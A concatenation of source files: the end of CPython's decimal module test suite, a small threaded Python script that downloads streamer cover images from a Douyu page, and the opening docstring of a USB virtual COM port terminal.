self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
FloatOperation = C.FloatOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
FloatOperation: C.DecFloatOperation,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
def test_internal_use_of_overridden_methods(self):
Decimal = C.Decimal
# Unsound subtyping
class X(float):
def as_integer_ratio(self):
return 1
def __abs__(self):
return self
class Y(float):
def __abs__(self):
return [1]*200
class I(int):
def bit_length(self):
return [1]*200
class Z(float):
def as_integer_ratio(self):
return (I(1), I(1))
def __abs__(self):
return self
for cls in X, Y, Z:
self.assertEqual(Decimal.from_float(cls(101.1)),
Decimal.from_float(101.1))
def test_maxcontext_exact_arith(self):
# Make sure that exact operations do not raise MemoryError due
# to huge intermediate values when the context precision is very
# large.
# The following functions fill the available precision and are
# therefore not suitable for large precisions (by design of the
# specification).
MaxContextSkip = ['logical_invert', 'next_minus', 'next_plus',
'logical_and', 'logical_or', 'logical_xor',
'next_toward', 'rotate', 'shift']
Decimal = C.Decimal
Context = C.Context
localcontext = C.localcontext
# Here only some functions that are likely candidates for triggering a
# MemoryError are tested. deccheck.py has an exhaustive test.
maxcontext = Context(prec=C.MAX_PREC, Emin=C.MIN_EMIN, Emax=C.MAX_EMAX)
with localcontext(maxcontext):
self.assertEqual(Decimal(0).exp(), 1)
self.assertEqual(Decimal(1).ln(), 0)
self.assertEqual(Decimal(1).log10(), 0)
self.assertEqual(Decimal(10**2).log10(), 2)
self.assertEqual(Decimal(10**223).log10(), 223)
self.assertEqual(Decimal(10**19).logb(), 19)
self.assertEqual(Decimal(4).sqrt(), 2)
self.assertEqual(Decimal("40E9").sqrt(), Decimal('2.0E+5'))
self.assertEqual(divmod(Decimal(10), 3), (3, 1))
self.assertEqual(Decimal(10) // 3, 3)
self.assertEqual(Decimal(4) / 2, 2)
self.assertEqual(Decimal(400) ** -1, Decimal('0.0025'))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure insures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if not orig_sys_decimal is sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
net07_douyu_threading.py | """多线程抓取斗鱼美女主播首页美女主播图片"""
'''
@Time : 2018/1/23 下午5:59
@Author : scrappy_zhang
@File : net07_douyu_threading.py
'''
import urllib.request
import re
import time
import threading
max_retry_count = 3
def down_img(url):
"""
下载图片
https://rpic.douyucdn.cn/live-cover/appCovers/2017/10/24/12017.jpg
"""
for i in range(max_retry_count):
try:
response = urllib.request.urlopen(url)
# bytes
data = response.read()
# 从url中得到文件名
file_name = url[url.rfind('/') + 1:]
# 打开文件用以写入
with open("img/" + file_name, "wb") as file:
file.write(data)
except Exception as e:
print("出错 %s 正在重试" % e)
else:
break
if __name__ == '__main__':
start = time.time() # 程序大约的开始时间
home = """https://www.douyu.com/directory/game/yz?page=1&isAjax=1""" # 首页地址
# 请求的时候需要带上头部 可以防止初步的反爬措施
headers = {
"Host": "www.douyu.com",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/62.0.3202.94 Safari/537.36"
}
# 构造好请求对象 将请求提交到服务器 获取的响应就是到首页的html代码
request = urllib.request.Request(url=home, headers=headers)
# urlopen函数可以直接传入url网址 也可以指定好一个请求对象
response = urllib.request.urlopen(request)
# 将收到的响应对象中数据的bytes数据读出出来 并且解码
html_data = response.read().decode()
# 使用正则 从所要抓取的网页中 提取出所有美女主播的图片链接,并存入一个列表
img_list = re.findall(r"https://.*?\.(?:jpg)", html_data)
# 下载美女主播图片
for img_url in img_list:
td = threading.Thread(target=down_img, args=(img_url,))
td.start()
# 阻塞程序直到所有线程运行完毕
while True:
length = len(threading.enumerate())
if length == 1:
break
end = time.time() # 程序大约的结束时间
print('耗时:', end - start)
|
vcp_terminal.py | #!/usr/bin/env python
"""
VIRTUAL COM PORT TERMINAL
- implements a read/write terminal for communicating
with pyusb devices
SERIAL STATE notifications (2 bytes, interrupt endpoint)
15..7 - reserved
6 bOverRun Received data has been discarded due to a device overrun
5 bParity A parity error has occurred
4 bFraming A framing error has occurred
3 bRingSignal State of the ring indicator (RI)
2 bBreak Break state
1 bTxCarrier State of the data set ready (DSR)
0 bRxCarrier State of carrier detect (CD)
Line Coding Data Field (7 bytes, control endpoint)
offset field (bytes) Description
--------------------------------------------------------------------
0 dwDTERate 4 bit rate (bits per second)
4 bCharFormat 1 stop bits (0 : 1bit, 1, 1.5bits, 2, 2bits)
5 bParityType 1 0:None, 1:Odd, 2:Even, 3:Mark, 4:Space
6 bDataBits 1 5, 6, 7, 8, 16
Control Line State Field (2 bytes, control endpoint)
